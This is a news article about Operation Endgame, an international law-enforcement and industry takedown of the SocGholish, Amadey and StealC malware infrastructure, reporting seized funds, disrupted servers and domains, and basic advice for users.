A coordinated international law enforcement and private-sector operation has dismantled major parts of the infrastructure behind the SocGholish, Amadey, and StealC malware families, seizing more than €41 million ($47 million) in cryptocurrency and disrupting hundreds of servers that supported ransomware, credential theft, and financial fraud campaigns.
The action, announced today by Europol, is part of Operation Endgame, an ongoing multinational effort targeting malware services that provide initial access for ransomware gangs and other cybercriminals. The operation involved authorities from Canada, Denmark, Germany, the Netherlands, the UK, and the US, working alongside Microsoft and several cybersecurity firms.
According to Europol, authorities and industry partners took action against 326 servers and 142 domains, and recovered roughly 27 million stolen credentials. The operation focused on malware commonly sold through “cybercrime-as-a-service” schemes, in which affiliates rent tools to infect systems and steal data, then pass access to other criminals for ransomware deployment or fraud.
Microsoft said it identified and moved to disrupt more than 200 command-and-control domains and IP addresses linked to the Amadey loader and StealC infostealer networks. The company worked with Europol and industry partners to seize, suspend, block, or otherwise disable the infrastructure supporting the malware operations.
Amadey and StealC play complementary roles in the cybercrime ecosystem. Amadey, active since 2018, is a malware loader used to gain an initial foothold on victim systems and deploy additional payloads. StealC is an information-stealing malware service that harvests browser credentials, cookies, cryptocurrency wallet data, email account information, and other sensitive data from infected devices. Microsoft noted that stolen credentials collected by infostealers frequently become the entry point for ransomware attacks and account compromise campaigns.
Europol said the operation also targeted SocGholish, also known as FakeUpdates, a malware loader linked to the Russian cybercrime group Evil Corp. Investigators remediated 14,971 compromised websites that had been distributing fake browser update prompts to visitors. The infected sites, many of them small businesses such as restaurants and auto repair shops, were used to trick users into installing malware that granted attackers remote access to their systems.
Research published by ESET reveals the scale of the disrupted infrastructure. The company, which participated in the operation, said the takedown affected approximately 50 domains and nearly 200 active command-and-control servers used by Amadey and StealC affiliates. ESET researchers identified 53 distinct Amadey affiliate clusters and 73 separate StealC clusters, highlighting how both malware families rely on decentralized infrastructure operated by individual customers rather than a shared backend.
The security vendor also reported that telemetry collected during the first half of 2026 showed Amadey and StealC being distributed globally through fake software updates, trojanized installers, phishing campaigns, and other malware loaders. Microsoft estimated that the two malware families were linked to more than 140,000 infected computers worldwide during the first two weeks of May alone.
The operation marks a shift in law enforcement strategy where, rather than targeting a single malware strain, investigators focused on disrupting the entire criminal supply chain used to deliver ransomware and steal credentials at scale. By simultaneously targeting loaders, infostealers, command-and-control infrastructure, and stolen data, authorities hope to make it significantly more difficult for cybercriminals to rebuild their operations.
Users are advised to avoid browser-based update prompts, install software only from trusted sources, enable multi-factor authentication, keep systems up to date, and immediately change passwords if they suspect their credentials may have been exposed.
Leave a Reply